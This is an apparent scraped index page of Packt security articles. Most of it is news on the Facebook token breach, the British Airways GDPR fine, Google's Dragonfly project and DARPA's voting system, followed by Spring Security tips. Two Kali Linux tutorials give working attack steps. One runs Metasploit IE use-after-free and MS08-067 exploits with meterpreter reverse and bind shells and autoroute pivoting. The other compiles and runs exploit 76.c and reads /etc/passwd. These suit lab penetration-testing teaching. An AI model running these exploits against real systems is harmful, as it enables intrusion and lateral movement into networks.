How-To Tutorials - Security

172 Articles

Facebook’s largest security breach in its history leaves 50M user accounts compromised

Sugandha Lahoti
01 Oct 2018
4 min read
Facebook has been going through a massive decline of trust in recent times, and to make matters worse, it witnessed another massive security breach last week. On Friday, Facebook announced that nearly 50 million Facebook accounts had been compromised by an attack that gave hackers the ability to take over users' accounts. The breach has not only affected users' Facebook accounts but also impacted other accounts linked to Facebook, which means a hacker could have accessed any account you log into using Facebook.

Facebook first discovered the issue on Tuesday, September 25. The hackers apparently exploited a series of interactions between three bugs related to Facebook's "View As" feature, which lets people see what their own profile looks like to someone else. The hackers stole Facebook access tokens to take over people's accounts. These tokens allow an attacker to take full control of a victim's account, including logging into third-party applications that use Facebook Login.

"I'm glad we found this and fixed the vulnerability," Mark Zuckerberg said on a conference call with reporters on Friday morning. "But it definitely is an issue that this happened in the first place. I think this underscores the attacks that our community and our services face."

The vulnerability has now been fixed and Facebook has contacted law enforcement authorities. The vice president of product management, Guy Rosen, said that Facebook was working with the FBI, but he did not comment on whether national security agencies were involved in the investigation. As a security measure, Facebook has automatically logged out 90 million Facebook users from their accounts: the 50 million that Facebook knows were affected and an additional 40 million that potentially could have been.

The attack exploited the complex interaction of multiple issues in Facebook's code. It originated from a change made to Facebook's video uploading feature in July 2017, which impacted "View As." Facebook says that affected users will see a message at the top of their News Feed about the issue when they log back into the social network: "Your privacy and security are important to us. We want to let you know about recent action we've taken to secure your account." The message is followed by a prompt to click and learn more details. Facebook has also publicly apologized, stating, "People's privacy and security is incredibly important, and we're sorry this happened. It's why we've taken immediate action to secure these accounts and let users know what happened."

This is not the end of Facebook's troubles. Some users have also tweeted that they were unable to post coverage of the breach from The Guardian and the Associated Press. When trying to share the story to their news feed, they were met with an error message that prevented them from doing so: "Our security systems have detected that a lot of people are posting the same content, which could mean that it's spam. Please try a different post." People have criticized Facebook's automated content-flagging tools over this, as an example of legitimate content being tagged as spam; the tools have also previously failed to detect harassment and hate speech. However, according to updates on Facebook's Twitter account, the bug has now been resolved.
https://twitter.com/facebook/status/1045796897506516992

The security breach comes at a time when the social media company is already facing multiple criticisms over issues such as foreign election interference, misinformation and hate speech, and data privacy. Recently, an indie Taiwanese hacker also gained attention with his plan to take down Mark Zuckerberg's Facebook page and broadcast the attempt live. However, he soon got cold feet and said he would refrain from doing so after receiving global attention following his announcement. "I am canceling my live feed, I have reported the bug to Facebook and I will show proof when I get a bounty from Facebook," he told Bloomberg News.

It's high time that Facebook began taking its users' privacy seriously, perhaps even rethinking its algorithms and platform entirely. It should also take responsibility for the real-world consequences of actions enabled by Facebook.

How far will Facebook go to fix what it broke: Democracy, Trust, Reality
WhatsApp co-founder reveals why he left Facebook; is called 'low class' by a Facebook senior executive
Ex-employee on contract sues Facebook for not protecting content moderators from mental trauma

British Airways set to face a record-breaking fine of £183m by the ICO over customer data breach

Sugandha Lahoti
08 Jul 2019
6 min read
The UK's data watchdog, the ICO, is set to fine British Airways more than £183m over a customer data breach. In September last year, British Airways notified the ICO about a data breach that compromised the personal identification information of over 500,000 customers and is believed to have begun in June 2018. The ICO said in a statement, "Following an extensive investigation, the ICO has issued a notice of its intention to fine British Airways £183.39M for infringements of the General Data Protection Regulation (GDPR)."

Information Commissioner Elizabeth Denham said, "People's personal data is just that - personal. When an organisation fails to protect it from loss, damage or theft, it is more than an inconvenience. That's why the law is clear - when you are entrusted with personal data, you must look after it. Those that don't will face scrutiny from my office to check they have taken appropriate steps to protect fundamental privacy rights."

How did the data breach occur?

According to the details provided on the British Airways website, payments through its main website and mobile app were affected from 22:58 BST August 21, 2018, until 21:45 BST September 5, 2018. Per the ICO's investigation, user traffic from the British Airways site was being directed to a fraudulent site, from where customer details were harvested by the attackers. The personal information compromised included login, payment card, and travel booking details, as well as name and address information. The attack is an example of what is known as a supply chain attack, which abuses code embedded from third-party suppliers to run payment authorisation, present ads, allow users to log into external services, and so on.

According to cyber-security expert Prof Alan Woodward at the University of Surrey, the British Airways hack may possibly have been the work of a company insider who tampered with the website and app's code for malicious purposes. He also pointed out that live data was harvested on the site rather than stored data.

https://twitter.com/EerkeBoiten/status/1148130739642413056

RiskIQ, a cyber security company based in San Francisco, linked the British Airways attack with the modus operandi of a threat group called Magecart. Magecart injects scripts designed to steal sensitive data that consumers enter into online payment forms on e-commerce websites, either directly or through compromised third-party suppliers. Per RiskIQ, Magecart set up custom, targeted infrastructure to blend in with the British Airways website specifically and to avoid detection for as long as possible.

What happens next for British Airways?

The ICO noted that British Airways cooperated with its investigation and has made security improvements since the breach was discovered. The airline now has 28 days to appeal. Responding to the news, British Airways' chairman and chief executive Alex Cruz said that the company was "surprised and disappointed" by the ICO's decision, and added that the company has found no evidence of fraudulent activity on accounts linked to the breach. He said, "British Airways responded quickly to a criminal act to steal customers' data. We have found no evidence of fraud/fraudulent activity on accounts linked to the theft. We apologise to our customers for any inconvenience this event caused." The ICO was appointed as the lead supervisory authority to tackle this case on behalf of other EU member state data protection authorities.
Under the GDPR's "one stop shop" provisions, the data protection authorities in the EU whose residents have been affected will also have the chance to comment on the ICO's findings. The penalty is divided up between the other European data authorities, while the money that comes to the ICO goes directly to the Treasury. What is somewhat surprising is that the ICO disclosed the fine publicly before the supervisory authorities had commented on its findings and a final decision had been taken based on their feedback, as pointed out by Simon Hania.

https://twitter.com/simonhania/status/1148145570961399808

Record-breaking fine appreciated by experts

The penalty imposed on British Airways is the first to be made public since the GDPR's new data privacy rules were introduced. The GDPR makes it mandatory to report data security breaches to the information commissioner, and it raised the maximum penalty to 4% of the penalized company's turnover. The fine would be the largest the ICO has ever issued; its previous record was the £500,000 fine levied on Facebook for the Cambridge Analytica scandal, which was the maximum under the 1998 Data Protection Act. The British Airways penalty amounts to 1.5% of its worldwide turnover in 2017, roughly 367 times that of Facebook's. In fact, it could have been even worse had the maximum penalty been levied; the full 4% of turnover would have meant a fine approaching £500m. Such a massive fine would clearly send a shudder down the spine of any big corporation responsible for handling cybersecurity: if they compromise customers' data, a severe punishment is in order.

https://twitter.com/j_opdenakker/status/1148145361799798785

Carl Gottlieb, Privacy Lead & Data Protection Officer at Duolingo, summarized the key points of this case in a much-appreciated Twitter thread. GDPR fines are for inappropriate security as opposed to getting breached; breaches are a good pointer but are not themselves actionable, so organisations need to implement security that is appropriate for their size, means, risk, and need. Security is an organisation's responsibility, whether you host IT yourself, outsource it, or rely on someone else not getting hacked. The GDPR has teeth against anyone that messes up security, but clearly action will be greatest where the human impact is most significant. Threats of GDPR fines are what created change in privacy and security practices over the last two years (not organisations suddenly growing a conscience), and with very few fines so far, improvements have slowed; this will help. Monetary fines are a great way to change behaviour in others, but a terrible punishment to drive change in an affected organisation; other enforcement measures, such as ceasing the processing of personal data (for example, banning new signups), would be much more impactful.

https://twitter.com/CarlGottlieb/status/1148119665257963521

Facebook fined $2.3 million by Germany for providing incomplete information about hate speech content
European Union fined Google 1.49 billion euros for antitrust violations in online advertising
French data regulator, CNIL imposes a fine of 50M euros against Google for failing to comply with GDPR

Using the client as a pivot point

Packt
17 Jun 2014
6 min read
Pivoting

To set up our potential pivot point, we first need to exploit a machine. Then we need to check for a second network card in the machine that is connected to another network, which we cannot reach without using the machine that we exploit. As an example, we will use three machines, with the Kali Linux machine as the attacker, a Windows XP machine as the first victim, and a Windows Server 2003 machine as the second victim. The scenario is that we get a client to visit our malicious site, and we use a use-after-free exploit against Microsoft Internet Explorer. This type of exploit has continued to plague the product for a number of revisions. An example of this is shown in the following screenshot from the Exploit DB website:

The exploit listed at the top of the list is one that is against Internet Explorer 9. As an example, we will target the exploit that is against Internet Explorer 8; the concept of the attack is the same. In simple terms, Internet Explorer developers continue to make the mistake of not cleaning up memory after it is allocated.

Start the Metasploit tool by entering msfconsole. Once the console has come up, enter search cve-2013-1347 to search for the exploit. An example of the results of the search is shown in the following screenshot:

One concern is that it is rated as good, but we like to find ratings of excellent or better when we select our exploits. For our purposes, we will see whether we can make it work. Of course, there is always a chance that we will not find what we need and have to make the choice to either write our own exploit or document it and move on with the testing.

For the example we use here, the Kali machine is 192.168.177.170, and it is what we set our LHOST to. For your purposes, you will have to use the Kali address that you have. We will enter the following commands in the Metasploit window:

use exploit/windows/browser/ie_cgenericelement_uaf
set SRVHOST 192.168.177.170
set LHOST 192.168.177.170
set PAYLOAD windows/meterpreter/reverse_tcp
exploit

An example of the results of the preceding commands is shown in the following screenshot:

As the previous screenshot shows, we now have the URL that we need to get the user to access. For our purposes, we will just copy and paste it into Internet Explorer 8, which is running on the Windows XP Service Pack 3 machine. Once we have pasted it, we may need to refresh the browser a couple of times to get the payload to work; however, in real life, we get just one chance, so select your exploits carefully so that one click by the victim does the intended work. Hence, to be a successful tester, a lot of practice and knowledge about the various exploits is of the utmost importance.
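Because you often get only one shot, it can help to script the listener setup so it comes up identically every time. The following is a minimal sketch using a Metasploit resource file; the file name pivot.rc is purely an illustrative choice, and the addresses match the lab setup used in this article.

# Save the browser-exploit setup shown above as a resource script (file name is illustrative)
cat > pivot.rc <<'EOF'
use exploit/windows/browser/ie_cgenericelement_uaf
set SRVHOST 192.168.177.170
set LHOST 192.168.177.170
set PAYLOAD windows/meterpreter/reverse_tcp
exploit -j
EOF

# Replay it in a quiet msfconsole session; -j runs the exploit server as a background job
msfconsole -q -r pivot.rc

With the module running as a job, the console stays free for the autoroute and scanning steps that follow once a victim browses to the generated URL.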
An example of what you should see once the exploit is complete and your session is created is shown in the following screenshot:

We now have a shell on the machine, and we want to check whether it is dual-homed. In the Meterpreter shell, enter ipconfig to see whether the machine you have exploited has a second network card. An example of the machine we exploited is shown in the following screenshot:

As the previous screenshot shows, we are in luck. We have a second network card connected and another network for us to explore, so let us do that now. The first thing we have to do is set the shell up to route to our newly found network. This is another reason why we chose the Meterpreter shell: it provides us with the capability to set the route up. In the shell, enter run autoroute -s 10.2.0.0/24 to set up a route to our 10 network. Once the command is complete, we will view our routing table; enter run autoroute -p to display it. An example of this is shown in the following screenshot:

As the previous screenshot shows, we now have a route to our 10 network via session 1. So, now it is time to see what is on our 10 network. Next, we will background session 1; press Ctrl+Z to background the session. We will use the scan capability from within our Metasploit tool. Enter the following commands:

use auxiliary/scanner/portscan/tcp
set RHOSTS 10.2.0.0/24
set PORTS 139,445
set THREADS 50
run

The port scanner is not very efficient, and the scan will take some time to complete. You can elect to use the Nmap scanner directly in Metasploit instead; enter nmap -sP 10.2.0.0/24. Once you have identified the live systems, conduct the scanning methodology against the targets. For our example here, we have our target located at 10.2.0.149. An example of the results for this scan is shown in the following screenshot:

We now have a target, and we could use a number of methods we covered earlier against it. For our purposes here, we will see whether we can exploit the target using the famous MS08-067 Server service buffer overflow. In the Metasploit window, put the session in the background and enter the following commands:

use exploit/windows/smb/ms08_067_netapi
set RHOST 10.2.0.149
set PAYLOAD windows/meterpreter/bind_tcp
exploit

If all goes well, you should see a shell open on the machine. When it does, enter ipconfig to view the network configuration on the machine. From here, it is just a matter of carrying out the process that we followed before, and if you find another dual-homed machine, then you can make another pivot and continue. An example of the results is shown in the following screenshot:

As the previous screenshot shows, the pivot was successful, and we now have another session open within Metasploit. This is reflected by the Local Pipe | Remote Pipe reference. Once you have finished reviewing the information, enter sessions to display the information for the sessions. An example of this result is shown in the following screenshot:

Summary

In this article, we looked at the powerful technique of establishing a pivot point from a client.

Further resources on this subject:
Installation of Oracle VM VirtualBox on Linux [article]
Using Virtual Destinations (Advanced) [article]
Quick Start into Selenium Tests [article]

Google bypassed its own security and privacy teams for Project Dragonfly, reveals The Intercept

Sugandha Lahoti
30 Nov 2018
5 min read
Google's Project Dragonfly has faced significant criticism and scrutiny from both the public and Google employees. In a major report yesterday, The Intercept revealed how internal conversations around Google's censored search engine for China shut out Google's legal, privacy, and security teams. According to named and anonymous senior Googlers who worked on the project and spoke to The Intercept's Ryan Gallagher, company executives appeared intent on watering down the privacy review, and Google bosses also worked to suppress employee criticism of the censored search engine.

Project Dragonfly is the secretive search engine that Google is allegedly developing to comply with Chinese censorship rules. It was kept secret from the company at large during the 18 months it was in development, until an insider leak led to its existence being revealed in The Intercept. Since then, it has been on the receiving end of constant backlash from human rights organizations and investigative reporters. Earlier this week, it also faced criticism from the human rights organization Amnesty International, which was followed by Google employees signing a petition protesting the project.

The secretive way Google operated Dragonfly

The majority of the details were reported by Yonatan Zunger, a security engineer on the Dragonfly team. He was asked to produce the privacy review for the project in early 2017. However, he faced opposition from Scott Beaumont, Google's top executive for China and Korea. According to Zunger, Beaumont "wanted the privacy review of Dragonfly to be pro forma and thought it should defer entirely to his views of what the product ought to be. He did not feel that the security, privacy, and legal teams should be able to question his product decisions, and maintained an openly adversarial relationship with them — quite outside the Google norm."

Beaumont also micromanaged the project and ensured that discussions about Dragonfly, and access to documents about it, were under his tight control. If members of the Dragonfly team broke the strict confidentiality rules, their contracts at Google could be terminated.

Privacy report by Zunger

Despite all these constraints, Zunger and his team were still able to produce a privacy report. The report described problematic scenarios that could arise if the search engine were launched in China. It noted that, in China, it would be difficult for Google to legally push back against government requests, refuse to build systems specifically for surveillance, or even notify people of how their data may be used. Zunger's meetings with the company's senior leadership to discuss the privacy report were repeatedly postponed. Zunger said, "When the meeting did finally take place, in late June 2017, I and my team were not notified, so we missed it and did not attend. This was a deliberate attempt to exclude us."

Dragonfly: Not just an experiment

The Intercept's report also undercut Sundar Pichai's recent public statement on Dragonfly, in which he described it as "just an experiment," adding that it remained unclear whether the company "would or could" eventually launch it in China. Google employees were surprised, as they had been told to prepare the search engine for launch between January and April 2019, or sooner. "What Pichai said [about Dragonfly being an experiment] was ultimately horse shit," said one Google source with knowledge of the project. "This was run with 100 percent intention of launch from day one.
He was just trying to walk back a delicate political situation." It is also alleged that Beaumont had intended from day one that the project should only be known about once it had been launched. "He wanted to make sure there would be no opportunity for any internal or external resistance to Dragonfly," one Google source told The Intercept.

This makes us wonder to what extent Google is really concerned about upholding its founding values, and how far it will go in advocating internet freedom, openness, and democracy. It now looks a lot like a company that simply prioritizes growth and expansion into new markets, even if it means compromising on issues like internet censorship and surveillance. Perhaps we shouldn't be surprised.

Google CEO Sundar Pichai is expected to testify in Congress on December 5 to discuss transparency and bias. Members of Congress will likely also ask about Google's plans in China. Public opinion on The Intercept's report is largely supportive.

https://twitter.com/DennGordon/status/1068228199149125634
https://twitter.com/mpjme/status/1068268991238541312
https://twitter.com/cynthiamw/status/1068240969990983680

Google employee and inclusion activist Liz Fong-Jones tweeted that she would match $100,000 in pledged donations to a fund to support employees who refuse to work in protest.

https://twitter.com/lizthegrey/status/1068212346236096513

She has also shown full support for Zunger.

https://twitter.com/lizthegrey/status/1068209548320747521

Google employees join hands with Amnesty International urging Google to drop Project Dragonfly
OK Google, why are you ok with mut(at)ing your ethos for Project DragonFly?
Amnesty International takes on Google over Chinese censored search engine, Project Dragonfly

At DefCon 27, DARPA's $10 million voting system could not be hacked by Voting Village hackers due to a bug

Savia Lobo
12 Aug 2019
4 min read
For the last two years, hackers have come to the Voting Village at the DefCon security conference in Las Vegas to scrutinize voting machines and analyze them for vulnerabilities. This year, at DefCon 27, the targeted machines included a $10 million voting system built under a DARPA (Defense Advanced Research Projects Agency) project. However, hackers were unable to break into the system, not because of robust security features, but due to technical difficulties during the setup. "A bug in the machines didn't allow hackers to access their systems over the first two days," CNET reports.

DARPA announced this voting system in March this year, hoping that it "will be impervious to hacking". The system is being designed by Galois, an Oregon-based verifiable-systems firm. "The agency hopes to use voting machines as a model system for developing a secure hardware platform—meaning that the group is designing all the chips that go into a computer from the ground up, and isn't using proprietary components from companies like Intel or AMD," Wired reports. Linton Salmon, the project's program manager at DARPA, says, "The goal of the program is to develop these tools to provide security against hardware vulnerabilities. Our goal is to protect against remote attacks."

Voting Village co-founder Harri Hursti said the five machines brought in by Galois "seemed to have had a myriad of different kinds of problems. Unfortunately, when you're pushing the envelope on technology, these kinds of things happen." "The Darpa machines are prototypes, currently running on virtualized versions of the hardware platforms they will eventually use." However, at Voting Village 2020, DARPA plans to include complete systems for hackers to access. Dan Zimmerman, principal researcher at Galois, said, "All of this is here for people to poke at. I don't think anyone has found any bugs or issues yet, but we want people to find things. We're going to make a small board solely for the purpose of letting people test the secure hardware in their homes and classrooms and we'll release that."

Sen. Wyden says if voting system security standards fail to change, the consequences will be much worse than the 2016 elections

After the cyberattacks in the 2016 U.S. presidential elections, there is a heightened risk to voter data in the upcoming presidential elections next year. Senator Ron Wyden said that if voting system security standards fail to change, the consequences could be far worse than the 2016 elections. In his speech on Friday at the Voting Village, Wyden said, "If nothing happens, the kind of interference we will see from hostile foreign actors will make 2016 look like child's play. We're just not prepared, not even close, to stop it."

Wyden proposed an election security bill requiring paper ballots in 2018. However, the bill was blocked in the Senate by Majority Leader Mitch McConnell, who called it partisan legislation. On Friday, a furious Wyden held McConnell responsible, calling him the reason why Congress hasn't been able to fix election security issues. "It sure seems like Russia's No. 1 ally in compromising American election security is Mitch McConnell," Wyden said.

https://twitter.com/ericgeller/status/1159929940533321728

According to a security researcher, the voting system has a terrible software vulnerability

Dan Wallach, a security researcher at Rice University in Houston, Texas, told Wired, "There's a terrible software vulnerability in there. I know because I wrote it.
It's a web server that anyone can connect to and read/write arbitrary memory. That's so bad. But the idea is that even with that in there, an attacker still won't be able to get to things like crypto keys or anything really. All they would be able to do right now is crash the system."

According to CNET, "While the voting process worked, the machines weren't able to connect with external devices, which hackers would need in order to test for vulnerabilities. One machine couldn't connect to any networks, while another had a test suite that didn't run, and a third machine couldn't get online."

The prototype machine allows people to vote with a touchscreen, print out their ballot, and insert it into the verification machine, which ensures that votes are valid through a security scan. According to Wired, Galois even added vulnerabilities on purpose to see how its system defended against flaws.

https://twitter.com/VotingVillageDC/status/1160663776884154369

To know more about this news in detail, head over to the Wired report.

DARPA plans to develop a communication platform similar to WhatsApp
DARPA's $2 Billion 'AI Next' campaign includes a Next-Generation Nonsurgical Neurotechnology (N3) program
Black Hat USA 2019 conference highlights: IBM's 'warshipping', OS threat intelligence bots, Apple's $1M bug bounty programs and much more!

Vulnerability Assessment

Packt
21 Jul 2017
11 min read
"Finding a risk is learning, Ability to identify risk exposure is a skill and exploiting it is merely a choice" In this article by Vijay Kumar Velu, the author of the book Mastering Kali Linux for Advanced Penetration Testing - Second Edition, we will learn about vulnerability assessment. The goal of passive and active reconnaissance is to identify the exploitable target and vulnerability assessment is to find the security flaws that are most likely to support the tester's or attacker's objective (denial of service, theft, or modification of data). The vulnerability assessment during the exploit phase of the kill chain focuses on creating the access to achieve the objective—mapping of the vulnerabilities to line up the exploits to maintain the persistent access to the target. Thousands of exploitable vulnerabilities have been identified, and most are associated with at least one proof-of-concept code or technique to allow the system to be compromised. Nevertheless, the underlying principles that govern success are the same across networks, operating systems, and applications. In this article, you will learn: Using online and local vulnerability resources Vulnerability scanning with nmap Vulnerability nomenclature Vulnerability scanning employs automated processes and applications to identify vulnerabilities in a network, system, operating system, or application that may be exploitable. When performed correctly, a vulnerability scan delivers an inventory of devices (both authorized and rogue devices); known vulnerabilities that have been actively scanned for, and usually a confirmation of how compliant the devices are with various policies and regulations. Unfortunately, vulnerability scans are loud—they deliver multiple packets that are easily detected by most network controls and make stealth almost impossible to achieve. They also suffer from the following additional limitations: For the most part, vulnerability scanners are signature based—they can only detect known vulnerabilities, and only if there is an existing recognition signature that the scanner can apply to the target. To a penetration tester, the most effective scanners are open source and they allow the tester to rapidly modify code to detect new vulnerabilities. Scanners produce large volumes of output, frequently containing false-positive results that can lead a tester astray; in particular, networks with different operating systems can produce false-positives with a rate as high as 70 percent. Scanners may have a negative impact on the network—they can create network latency or cause the failure of some devices (refer to the Network Scanning Watch List at www.digininja.org, for devices known to fail as a result of vulnerability testing). In certain jurisdictions, scanning is considered as hacking, and may constitute an illegal act. There are multiple commercial and open source products that perform vulnerability scans. Local and online vulnerability databases Together, passive and active reconnaissance identifies the attack surface of the target, that is, the total number of points that can be assessed for vulnerabilities. A server with just an operating system installed can only be exploited if there are vulnerabilities in that particular operating system; however, the number of potential vulnerabilities increases with each application that is installed. Penetration testers and attackers must find the particular exploits that will compromise known and suspected vulnerabilities. 
The first place to start the search is at vendor sites; most hardware and application vendors release information about vulnerabilities when they release patches and upgrades. If an exploit for a particular weakness is known, most vendors will highlight this to their customers. Although their intent is to allow customers to test for the presence of the vulnerability themselves, attackers and penetration testers will take advantage of this information as well.

Other online sites that collect, analyze, and share information about vulnerabilities are as follows:
The National Vulnerability Database, which consolidates all public vulnerability data released by the US Government, available at http://web.nvd.nist.gov/view/vuln/search
Secunia, available at http://secunia.com/community/
The Open Source Vulnerability Database Project (OSVDB), available at http://www.osvdb.org/search/advsearch
Packetstorm Security, available at http://packetstormsecurity.com/
SecurityFocus, available at http://www.securityfocus.com/vulnerabilities
Inj3ct0r, available at http://1337day.com/
The Exploit Database maintained by Offensive Security, available at http://www.exploit-db.com

The Exploit Database is also copied locally to Kali, and it can be found in the /usr/share/exploitdb directory. Before using it, make sure that it has been updated using the following commands:

cd /usr/share/exploitdb
wget http://www.exploit-db.com/archive.tar.bz2
tar -xvjf archive.tar.bz2
rm archive.tar.bz2

To search the local copy of exploitdb, open a Terminal window and enter searchsploit and the desired search term(s) at the Command Prompt. This will invoke a script that searches a database file (.csv) containing a list of all exploits. The search will return a description of known vulnerabilities as well as the path to a relevant exploit. The exploit can be extracted, compiled, and run against specific vulnerabilities. Take a look at the following screenshot, which shows the description of the vulnerabilities:

The search script scans each line in the CSV file from left to right, so the order of the search terms is important: a search for Oracle 10g will return several exploits, but 10g Oracle will not return any. Also, the script is inconsistently case sensitive: although you are instructed to use lowercase characters in the search term, the same product name searched with different capitalization (bulletproof FTP versus Bulletproof FTP, for example) can return a different number of hits. More effective searches of the CSV file can be conducted using the grep command or a search tool such as KWrite (apt-get install kwrite).
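A quick sketch of what such a search and retrieval might look like on the command line (the search terms are taken from the examples above; the copy path is illustrative and reflects the /platforms/windows/remote layout described later):

# Keyword search against the local copy of the Exploit Database
searchsploit oracle 10g

# Term order and capitalization can change the results, so try variations
searchsploit 10g oracle

# Copy a returned exploit into /tmp for customization and compilation (path is illustrative)
cp /usr/share/exploitdb/platforms/windows/remote/76.c /tmp/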
A search of the local database may identify several possible exploits with a description and a path listing; however, these will have to be customized to your environment and then compiled prior to use. Copy the exploit to the /tmp directory (the given path does not take into account that the /windows/remote directory resides in the /platforms directory). Exploits presented as scripts, such as Perl, Ruby, and PHP, are relatively easy to implement. For example, if the target is a Microsoft IIS 6.0 server that may be vulnerable to a WebDAV remote authentication bypass, copy the exploit to the root directory and then execute it as a standard Perl script, as shown in the following screenshot:

Many of the exploits are available as source code that must be compiled before use. For example, a search for RPC-specific vulnerabilities identifies several possible exploits. An excerpt is shown in the following screenshot:

The RPC DCOM vulnerability identified as 76.c is known from practice to be relatively stable, so we will use it as an example. To compile this exploit, copy it from the storage directory to the /tmp directory. In that location, compile it using GCC with the following command:

root@kali:~# gcc 76.c -o 76.exe

This will use the GNU Compiler Collection to compile 76.c to a file with the output (-o) name of 76.exe, as shown in the following screenshot:

When you invoke the application against the target, you must call the executable (which is now stored in the /tmp directory) using a symbolic link as follows:

root@kali:~# ./76.exe

The source code for this exploit is well documented, and the required parameters are clear at execution, as shown in the following screenshot:

Unfortunately, not all exploits from the Exploit Database and other public sources compile as readily as 76.c. There are several issues that make the use of such exploits problematic, even dangerous, for penetration testers:

Deliberate errors or incomplete source code are commonly encountered, as experienced developers attempt to keep exploits away from inexperienced users, especially beginners who are trying to compromise systems without knowing the risks that go with their actions.
Exploits are not always sufficiently documented; after all, there is no standard that governs the creation and use of code intended to compromise a data system. As a result, they can be difficult to use, particularly for testers who lack expertise in application development.
Inconsistent behaviors due to changing environments (new patches applied to the target system and language variations in the target application) may require significant alterations to the source code; again, this may require a skilled developer.
There is always the risk of freely available code containing malicious functionality. A penetration tester may think that they are conducting a proof of concept (POC) exercise and be unaware that the exploit has also created a backdoor in the application being tested that could be used by the developer.

To ensure consistent results and create a community of coders who follow consistent practices, several exploit frameworks have been developed. The most popular exploitation framework is the Metasploit framework.

Vulnerability scanning with nmap

There are no security operating system distributions without nmap. So far, we have discussed how to utilize nmap during active reconnaissance, but attackers don't just use nmap to find open ports and services; they also engage nmap to perform vulnerability assessment. As of 10 March 2017, the latest version of nmap is 7.40, and it ships with 500+ NSE (nmap scripting engine) scripts, as shown in the following screenshot:

Penetration testers utilize nmap's most powerful and flexible features, which allow them to write their own scripts and automate them to ease exploitation. Primarily, the NSE was developed for the following reasons:

Network discovery: the primary purpose for which attackers utilize nmap.
Classier version detection of a service: there are thousands of services with multiple version details for the same service, and NSE makes detection more sophisticated.
Vulnerability detection: to automatically identify vulnerabilities across a vast network range; however, nmap itself cannot be a full vulnerability scanner.
Backdoor detection: some of the scripts are written to identify the patterns of worm infections on a network, which makes it easier for attackers to narrow down and focus on taking over the machine remotely.
Vulnerability exploitation: attackers can also utilize nmap to perform exploitation in combination with other tools such as Metasploit, or write custom reverse shell code and combine it with nmap's exploitation capability.

Before firing up nmap to perform the vulnerability scan, penetration testers must update the nmap script database to see whether any new scripts have been added, so that they don't miss vulnerability identification:

nmap --script-updatedb

Use the following command to run all the scripts against the target host:

nmap -T4 -A -sV -v3 -d -oA Targetoutput --script all --script-args vulns.showall target.com

Introduction to LUA scripting

LUA is a lightweight, embeddable scripting language built on top of the C programming language; it was created in Brazil in 1993 and is still actively developed. It is a powerful and fast programming language mostly used in gaming applications and image processing. The complete source code, manual, plus binaries for some platforms do not go beyond 1.44 MB (less than a floppy disk). Some of the security tools developed in LUA are nmap, Wireshark, and Snort 3.0. One of the reasons why LUA was chosen as a scripting language in information security is its compactness, its lack of buffer overflow and format string vulnerabilities, and the fact that it can be interpreted.

LUA can be installed directly on Kali Linux by issuing the apt-get install lua5.1 command in the Terminal. The following code extract is a sample script that reads a file and prints the first line:

#!/usr/bin/lua
local file = io.open("/etc/passwd", "r")
contents = file:read()
file:close()
print(contents)

LUA is similar to other scripting languages such as Bash and Perl. The preceding script should produce the output shown in the following screenshot:

Customizing NSE scripts

In order to achieve maximum effectiveness, customizing scripts helps penetration testers find the right vulnerabilities within the given span of time (attackers, of course, are not under the same time limit). The following code extract is a LUA NSE script to identify a specific file location that we will search for across the entire subnet using nmap:

local http = require 'http'

description = [[
This is my custom discovery on the network
]]

categories = {"safe", "discovery"}

function portrule(host, port)
  return port.number == 80
end

function action(host, port)
  local response
  response = http.get(host, port, "/test.txt")
  if response.status and response.status ~= 404 then
    return "successful"
  end
end

Save the file into the /usr/share/nmap/scripts/ folder. Finally, your script is ready to be tested, as shown in the following screenshot; you should be able to run your own NSE script without any problems:

To completely understand the preceding NSE script, here is a description of what is in the code:
local http: requires the HTTP library; this line loads nmap's HTTP script and makes it available to the script as a local variable.
description: where testers/researchers can enter the description of the script.
categories: this typically has two variables, one of which declares whether the script is safe or intrusive.
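Assuming the script above was saved under /usr/share/nmap/scripts/ as mydiscovery.nse (the file name and the 192.168.177.0/24 subnet here are illustrative assumptions, not values from the article), a quick way to exercise it from the command line is:

# Refresh nmap's script database so the new script is picked up
nmap --script-updatedb

# Run only the custom script against port 80 across the lab subnet
nmap -p 80 --script mydiscovery.nse 192.168.177.0/24

Hosts that return anything other than a 404 for /test.txt will be reported as successful, mirroring the logic of the action function.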

Spring Security 3: Tips and Tricks

Packt
28 Feb 2011
6 min read
Spring Security 3: Make your web applications impenetrable. Implement authentication and authorization of users. Integrate Spring Security 3 with common external security providers. Packed full of concrete, simple, and concise examples.

It's a good idea to change the default value of the spring_security_login page URL.
Tip: Not only would the resulting URL be more user- or search-engine friendly, it will also disguise the fact that you're using Spring Security as your security implementation. Obscuring Spring Security in this way could make it harder for malicious hackers to find holes in your site in the unlikely event that a security hole is discovered in Spring Security. Although security through obscurity does not reduce your application's vulnerability, it does make it harder for standardized hacking tools to determine what types of vulnerabilities you may be susceptible to.

Evaluating authorization rules
Tip: For any given URL request, Spring Security evaluates authorization rules in top-to-bottom order, and the first rule matching the URL pattern is applied. Typically, this means that your authorization rules will be ordered from most specific to least specific. It's important to remember this when developing complicated rule sets, as developers can often get confused over which authorization rule takes effect. Just remember the top-to-bottom order, and you can easily find the correct rule in any scenario!

Using the JSTL URL tag to handle relative URLs
Tip: Use the JSTL core library's url tag to ensure that URLs you provide in your JSP pages resolve correctly in the context of your deployed web application. The url tag will resolve URLs provided as relative URLs (starting with a /) to the root of the web application. You may have seen other techniques to do this using JSP expression code (<%=request.getContextPath() %>), but the JSTL url tag allows you to avoid inline code!

Modifying the username or password and the remember me feature
Tip: As you may have anticipated, if the user changes their username or password, any remember me tokens that have been set will no longer be valid. Make sure that you provide appropriate messaging to users if you allow them to change these bits of their account.

Configuration of remember me session cookies
Tip: If token-validity-seconds is set to -1, the login cookie will be set to a session cookie, which does not persist after the user closes their browser. The token will be valid (assuming the user doesn't close their browser) for a non-configurable length of 2 weeks. Don't confuse this with the cookie that stores your user's session ID—they're two different things with similar names!

Checking full authentication without expressions
Tip: If your application does not use SpEL expressions for access declarations, you can still check whether the user is fully authenticated by using the IS_AUTHENTICATED_FULLY access rule (for example, access="IS_AUTHENTICATED_FULLY"). Be aware, however, that standard role access declarations aren't as expressive as SpEL ones, so you will have trouble handling complex boolean expressions.

Debugging remember me cookies
Tip: There are two difficulties when attempting to debug issues with remember me cookies. The first is getting the cookie value at all! Spring Security doesn't offer any log level that will log the cookie value that was set. We'd suggest a browser-based tool such as Chris Pederick's Web Developer plug-in (http://chrispederick.com/work/web-developer/) for Mozilla Firefox. Browser-based development tools typically allow selective examination (and even editing) of cookie values. The second (admittedly minor) difficulty is decoding the cookie value. You can feed the cookie value into an online or offline Base64 decoder (remember to add a trailing = sign to make it a valid Base64-encoded string!).
